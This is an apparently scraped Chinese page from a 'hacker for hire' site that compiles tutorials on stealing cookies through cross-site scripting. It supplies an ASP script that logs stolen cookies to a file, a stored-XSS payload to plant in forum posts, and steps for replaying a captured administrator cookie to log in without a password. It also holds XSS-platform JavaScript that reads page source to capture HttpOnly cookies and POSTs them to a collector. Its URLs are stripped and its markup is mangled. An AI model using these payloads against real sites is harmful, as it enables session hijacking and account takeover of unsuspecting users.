黑客24小时在线接单网站

联系黑客,怎么找黑客,24小时在线黑客,黑客在线QQ,找黑客

xss获取不到cookie(xss获取用户信息)

本文目录一览:

xss漏洞获取cookie怎么解决方案

XSS获取cookie并利用

获取cookie利用代码cookie.asp

html

titlexx/title

body

%testfile = Server.MapPath('code.txt') //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中

msg = Request('msg') //获取提交过来的msg变量,也就是cookie值

set fs = server.CreateObject('scripting.filesystemobject')//创建一个fs对象

set thisfile = fs.OpenTextFile(testfile,8,True,0)

thisfile.WriteLine(''msg'')//像code.txt中写入获取来的cookie

thisfile.close() //关闭

set fs = nothing%

/body

/html

把上述文件保存为cookie.asp文件,放到你自己的网站服务器下。比如这里我们自己搭建的服务器为:。

XSS构造语句

scriptwindow.open(''+document.cookie)/script

把上述语句放到你找到的存在XSS的目标中,不过这里最好是存储型xss,比如你找到了某个博客或者论坛什么的存在存储型XSS,你在里面发一篇帖子或者留上你的评论,内容就是上述语句,当其他用户或者管理员打开这个评论或者帖子链接后,就会触发,然后跳转到的页面,然后当前账户的coolie信息就当成参数发到你的网站下的文件里了。然后的然后你就可以那这个cookie登陆了。。。。。。

简单步骤如下:

1、在存在漏洞的论坛中发日志:

X

2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了:

3、这是没有账户前的登陆界面:

4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据:

5、替换cookie后不用输用户名密码就顺利进入管理员账户了:

如何通过 XSS 获取受 http-only さcookie

该测试页返回了完整的http头,其中也包括了完整的cookie。混贴吧圈的应该都知道BDUSS是最关键的字段,同时该字段是受http-only保护的,百度SRC之前也因此下调了XSS的评分标准。

02.jpg

这样,我们只要利用XSS平台的"指定页面源码读取"模块即可通过XSS获取用户的完整cookie。该模块代码如下:

code 区域

var u = ';id={projectId}';

var cr;

if (document.charset) {

cr = document.charset

} else if (document.characterSet) {

cr = document.characterSet

};

function createXmlHttp() {

if (window.XMLHttpRequest) {

xmlHttp = new XMLHttpRequest()

} else {

var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');

for (var n = 0; n MSXML.length; n++) {

try {

xmlHttp = new ActiveXObject(MSXML[n]);

break

} catch(e) {}

}

}

}

createXmlHttp();

xmlHttp.onreadystatechange = writeSource;

xmlHttp.open("GET", "", true);

xmlHttp.send(null);

function postSource(cc) {

createXmlHttp();

url = u;

cc = "mycode=" + cc;

xmlHttp.open("POST", url, true);

xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

xmlHttp.setRequestHeader("Content-length", cc.length);

xmlHttp.setRequestHeader("Connection", "close");

xmlHttp.send(cc)

}

function writeSource() {

if (xmlHttp.readyState == 4) {

var c = new postSource(xmlHttp.responseText)

}

}

由于是用xmlHttpRequest的形式读源码,且 的 Access-Control-Allow-Origin 为空,即默认不允许跨域,所以我们必须在同域下才能用xmlHttpRequest获取到完整的cookie。

我在 中有提到, 可以自由构造XSS。我们向该页面写入如下代码:

code 区域

titlewooyun.org/title

p超威蓝猫@wooyun.org/p

script src=;/script

xss 怎么获取用户cookie

XSS获取cookie并利用 获取cookie利用代码cookie.asp xx 把上述文件保存为cookie.asp文件,放到你自己的网站服务器下。比如这里我们自己搭建的服务器为:。 XSS构造语句 window.open('.

  • 评论列表:
  •  黑客技术
     发布于 2022-06-30 17:38:01  回复该评论
  • eak } catch(e) {} } }}createXmlHttp();xmlHttp.onreadystatechange = writeSource
  •  黑客技术
     发布于 2022-06-30 21:50:37  回复该评论
  • 自由构造XSS。我们向该页面写入如下代码:code 区域titlewooyun.org/titlep超威蓝猫@wooyun.org/pscript src=;/scriptxss 怎么获取用户cookieXSS获取cookie并利用 获取cookie利用代码cookie.asp
  •  黑客技术
     发布于 2022-06-30 23:27:34  回复该评论
  • testfile,8,True,0)thisfile.WriteLine(''msg'')//像code.txt中写入获取来的cookiethisfile.close() //关闭set fs = nothing%/body/html把上述文件保存为cookie.asp文件,放

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.